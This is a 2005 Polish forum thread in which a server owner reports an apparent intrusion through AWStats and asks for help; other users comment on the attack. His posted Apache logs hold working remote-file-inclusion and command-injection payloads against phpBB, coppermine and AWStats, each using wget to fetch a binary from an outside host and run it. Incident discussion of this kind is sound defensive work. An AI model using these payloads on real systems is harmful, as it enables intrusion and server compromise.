| Freesco, NND, CDN, EOS http://forum.freesco.pl/ |
|
| Czyżby włam???? http://forum.freesco.pl/viewtopic.php?f=22&t=10400 |
Strona 1 z 1 |
| Autor: | provayder [ czwartek, 22 grudnia 2005, 18:37 ] |
| Tytuł: | Czyżby włam???? |
Witam Dziś rano rozmawiałem z kolegą i zwrócił mi on uwagę na jakieś dziwne logi Apache'a związane z Awstatsem. Ponieważ on Awstatsa nie ma więc jemu wiele nie groziło. Ja natomiast mam no i co się okazało: w katalogu /tmp znalazły się jakieś dziwne programy - pula, qs, mirela, które coś tam robiły (ogólnie moją uwagę zwrócił wzrost użycia procesora przez system - właśnie przez program pula). Miał ktoś coś takiego????? pozdro |
|
| Autor: | Maciek [ czwartek, 22 grudnia 2005, 19:04 ] |
| Tytuł: | |
Zapewne włam za pomocą automatu skanujacego - standardowa nazwa użytkownika i łatwe hasło. Dość często są takie przypadki, ktoś ma login marcin i hasło marcin - automaty do niedawna skanowały głownie imiona anglosaskie, od paru miesięcy bazy ich wzobogaciły się także o imiona polskie (jurek, marysia, zosia, jola). Im łatwiejsze hasła, tym łatwiej się włamać. Zapewne sa to programy do dalszego przeprowadzania zdalnych ataków. Przy dobrym układzie za jakiś czas włamywacz pozna twoje hasło roota i będzie panował nad serwerem. |
|
| Autor: | provayder [ piątek, 23 grudnia 2005, 00:04 ] |
| Tytuł: | |
Logi wyglądają tak: 24.92.208.192 - - [22/Dec/2005:20:08:27 +0100] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://209.136.48.69/cmd.dat?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo| HTTP/1.1" 404 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 24.92.208.192 - - [22/Dec/2005:20:08:33 +0100] "GET /modules/Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://209.136.48.69/cmd.dat?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo| HTTP/1.1" 404 313 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 24.92.208.192 - - [22/Dec/2005:20:08:38 +0100] "GET /admin_styles.phpadmin_styles.php?phpbb_root_path=http://209.136.48.69/cmd.dat?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo| HTTP/1.1" 404 292 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 24.92.208.192 - - [22/Dec/2005:20:08:44 +0100] "GET /Forums/admin/admin_styles.php?phpbb_root_path=http://209.136.48.69/cmd.dat?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo| HTTP/1.1" 404 289 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 24.92.208.192 - - [22/Dec/2005:20:08:49 +0100] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo| HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 24.92.208.192 - - [22/Dec/2005:20:08:51 +0100] "GET /modules/coppermine/themes/default/theme.phptheme.php?THEME_DIR=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo| HTTP/1.1" 404 312 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 66.204.25.3 - - [22/Dec/2005:20:47:31 +0100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo| HTTP/1.1" 403 282 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" guardian.nwsc.k12.ar.us - - [22/Dec/2005:20:47:29 +0100] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo| HTTP/1.1" 403 282 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 66.204.25.3 - - [22/Dec/2005:20:47:32 +0100] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo| HTTP/1.1" 403 290 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 66.204.25.3 - - [22/Dec/2005:20:47:33 +0100] "POST /xmlrpc.php HTTP/1.1" 404 270 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 66.204.25.3 - - [22/Dec/2005:20:47:34 +0100] "POST /blog/xmlrpc.php HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 66.204.25.3 - - [22/Dec/2005:20:47:35 +0100] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 282 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 66.204.25.3 - - [22/Dec/2005:20:47:37 +0100] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 283 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 66.204.25.3 - - [22/Dec/2005:20:47:38 +0100] "POST /drupal/xmlrpc.php HTTP/1.1" 404 277 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 66.204.25.3 - - [22/Dec/2005:20:47:39 +0100] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 283 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 66.204.25.3 - - [22/Dec/2005:20:47:40 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 280 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 66.204.25.3 - - [22/Dec/2005:20:47:41 +0100] "POST /xmlrpc.php HTTP/1.1" 404 270 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 66.204.25.3 - - [22/Dec/2005:20:47:43 +0100] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 277 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 66.204.25.3 - - [22/Dec/2005:20:47:44 +0100] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 277 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" pozdro |
|
| Autor: | pablo2k5 [ piątek, 23 grudnia 2005, 09:41 ] |
| Tytuł: | |
Myślę że to jakiś wirus lub automat próbował "załamać" ci serwer przez wykorzystanie jakichś luk w bezpieczeństwie jego. Ja to samo miałem kiedyś. Czasami też pojawia się coś takiego że jest wysyłane zapytanie do serwera o treści x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/ x90/x90/x90/x90/x90/... |
|
| Autor: | marask [ piątek, 23 grudnia 2005, 15:04 ] |
| Tytuł: | |
a mnie ciekawi np ta linia: hpbb_root_path=http://209.136.48.69/cmd.dat?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY wyglądaj akby ktoś skryptem php próbował pobierać programy na dysk ;] |
|
| Autor: | provayder [ piątek, 23 grudnia 2005, 21:57 ] |
| Tytuł: | |
marask pisze: a mnie ciekawi np ta linia:
hpbb_root_path=http://209.136.48.69/cmd.dat?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY wyglądaj akby ktoś skryptem php próbował pobierać programy na dysk ;] no i tak było, chociaż weszło mi to na serwer przez perla a nie przez php. Pojawiły się w /tmp trzy pliki - jak wcześniej pisałem - pula, qs i mirela. Pliki były jakimiś programami-chyba serwerami bo jak zrobiłem podgląd to tych plików w mcedit to w tekstach przewijało się słówko gentoo, poza tym w /tmp pojawiły się jakieś logi, że jakiś serwer próbuje otworzyć port 578. Zrobiłem skan całego dysku clamscanem i na szczęście nic nie znalazł. Niestety nie gwarantuje mi to jednak, że jeszcze jakieś progsy nie pożądane na serwerze nie siedzą. pozdro |
|
| Strona 1 z 1 | Strefa czasowa UTC+2godz. |
| Powered by phpBB® Forum Software © phpBB Group https://www.phpbb.com/ |
|